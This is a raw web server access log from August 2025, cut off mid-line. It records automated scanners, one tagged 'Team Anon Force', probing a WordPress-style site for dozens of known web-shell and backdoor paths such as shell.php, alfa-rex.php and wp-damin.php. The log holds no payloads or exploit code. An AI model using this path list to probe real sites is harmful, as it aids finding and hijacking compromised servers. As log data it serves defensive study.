- - [12/Aug/2025:07:25:58 -0400] "GET /wp-admin/css/wp-login.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:26:08 -0400] "GET /cgi-bin/wp-login.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:26:19 -0400] "GET /wp-admin/maint/wp-login.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:26:36 -0400] "GET /defaul1.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:26:42 -0400] "GET /repeater.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:26:50 -0400] "GET /sts.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:27:03 -0400] "GET /wp-l0gin.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 206.189.247.132 - - [12/Aug/2025:07:27:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:07:27:09 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:07:27:09 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:07:27:09 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:07:27:13 -0400] "GET /classwithtostring.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:27:22 -0400] "GET /autoload_classmap.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:27:30 -0400] "GET /g.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:27:37 -0400] "GET /doc.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:27:42 -0400] "GET /setup-config.php HTTP/1.1" 301 251 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:27:47 -0400] "GET /wp-load.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:27:52 -0400] "GET /blog.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:27:55 -0400] "GET /shell.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:28:00 -0400] "GET /wp-conflg.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:28:06 -0400] "GET /wp-2019.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:28:10 -0400] "GET /wp-content/plugins/about.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:28:14 -0400] "GET /wp-admin/includes/themes.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:28:17 -0400] "GET /M1.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:28:20 -0400] "GET /.well-known/acme-challenge/atomlib.php HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 149.102.237.41 - - [12/Aug/2025:07:28:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:07:28:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:07:28:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:07:28:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:07:28:24 -0400] "GET /wp-content/index.php?x=ooo HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:28:28 -0400] "GET /mah.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:28:32 -0400] "GET /wp-content/plugins/wordpresss3cll/wp-login.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:28:36 -0400] "GET /wp-admin/about.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:28:40 -0400] "GET /wp-content/about.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:28:44 -0400] "GET /wp-admin/install.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:28:48 -0400] "GET /wp-admin/js/about.php7 HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:28:53 -0400] "GET /wp-content/install.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:28:56 -0400] "GET /wp-admin/user/about.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:29:01 -0400] "GET /wp-includes/install.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:29:05 -0400] "GET /wp-admin/images/admin.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:29:09 -0400] "GET /wp-includes/Text/about.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:29:13 -0400] "GET /wp-admin/network/admin.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:29:18 -0400] "GET /wp-admin/maint/atomlib.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:29:23 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:29:27 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:29:31 -0400] "GET /wp-content/uploads/index.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:29:35 -0400] "GET /wp-content/themes/twentytwentythree/patterns/index.php HTTP/1.1" 301 289 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 216.73.216.186 - - [12/Aug/2025:07:41:30 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 152.42.157.60 - - [12/Aug/2025:07:42:51 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:07:42:51 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:07:42:51 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:07:42:51 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:07:42:53 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:07:42:53 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:07:42:53 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:07:42:53 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 216.73.216.186 - - [12/Aug/2025:07:43:45 -0400] "GET /.well-known/acme-challenge/2AHZL7NY74OYOSI8EC5ET_QIC8QT6TJY HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 209.38.125.40 - - [12/Aug/2025:07:44:42 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:07:44:42 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:07:44:42 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:07:44:42 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 146.190.11.185 - - [12/Aug/2025:07:45:39 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:07:45:39 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:07:45:39 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:07:45:39 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 52.23.225.234 - - [12/Aug/2025:07:49:15 -0400] "GET /wp-config-sample.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 145.220.91.19 - - [12/Aug/2025:07:53:44 -0400] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0" 209.38.125.40 - - [12/Aug/2025:07:55:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:07:55:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:07:55:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:07:55:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 68.183.245.101 - - [12/Aug/2025:07:57:25 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:07:57:25 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:07:57:25 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:07:57:25 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 52.23.225.234 - - [12/Aug/2025:07:58:15 -0400] "GET /wp-includes/js/tinymce/skins/wordpress/images/index.php HTTP/1.1" 301 286 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 149.102.237.41 - - [12/Aug/2025:08:00:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:08:00:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:08:00:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:08:00:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 52.23.225.234 - - [12/Aug/2025:08:04:16 -0400] "GET /wp-includes/js/tinymce/skins/lightgray/fonts/index.php HTTP/1.1" 301 285 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 52.23.225.234 - - [12/Aug/2025:08:10:10 -0400] "GET /wp-includes/js/tinymce/plugins/compat3x/css/index.php HTTP/1.1" 301 284 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 172.190.142.176 - - [12/Aug/2025:08:10:41 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 279 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:42 -0400] "GET /wp-includes/php-compat/02.php HTTP/1.1" 301 260 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:43 -0400] "GET /update/manager.php HTTP/1.1" 301 249 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:44 -0400] "GET /wp-includes/Text/Diff/Engine/network.php HTTP/1.1" 301 271 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:44 -0400] "GET /wp-content/mu-plugins/wp-damin.php HTTP/1.1" 301 265 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:45 -0400] "GET /wp-includes/html-api/alfa-rex.php HTTP/1.1" 301 264 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:45 -0400] "GET /wp-content/upgrade-temp-backup/cong.php HTTP/1.1" 301 270 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:46 -0400] "GET /wp-includes/js/atomlib.php HTTP/1.1" 301 257 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:46 -0400] "GET /wp-admin/js/wp-2019.php HTTP/1.1" 301 254 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:47 -0400] "GET /wp-includes/block-supports/system_log.php HTTP/1.1" 301 272 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:47 -0400] "GET /uploads/wp-login.php HTTP/1.1" 301 251 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:48 -0400] "GET /wp-content/languages/alfa-rex.php HTTP/1.1" 301 264 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:48 -0400] "GET /wp-includes/widgets/network.php HTTP/1.1" 301 262 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:48 -0400] "GET /js/log.php HTTP/1.1" 301 241 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:49 -0400] "GET /update/inputs.php HTTP/1.1" 301 248 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:49 -0400] "GET /wp-includes/fonts/mail.php HTTP/1.1" 301 257 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:50 -0400] "GET /wp-admin/includes/db.php?u HTTP/1.1" 301 257 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:50 -0400] "GET /update/buy.php HTTP/1.1" 301 245 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:51 -0400] "GET /wp-includes/js/fm.php HTTP/1.1" 301 252 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:51 -0400] "GET /cgi-bin/autoload_classmap.php HTTP/1.1" 301 260 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:51 -0400] "GET /wp-content/themes/cay-van-phong/up.php HTTP/1.1" 301 269 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:52 -0400] "GET /uploads/getid3s.php HTTP/1.1" 301 250 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:52 -0400] "GET /uploads/mar.php HTTP/1.1" 301 246 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:53 -0400] "GET /wp-content/themes/twentytwentytwo/wp-damin.php HTTP/1.1" 301 277 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:53 -0400] "GET /wp-includes/html-api/0x.php HTTP/1.1" 301 258 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:54 -0400] "GET /modules/mod_simplefileuploadv1.3/elements/cc.php HTTP/1.1" 301 279 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:54 -0400] "GET /wp-admin/js/widgets/webadmin.php HTTP/1.1" 301 263 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:55 -0400] "GET /wp-includes/images/wlw/upload.php HTTP/1.1" 301 264 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:55 -0400] "GET /wp-includes/rest-api/edit.php HTTP/1.1" 301 260 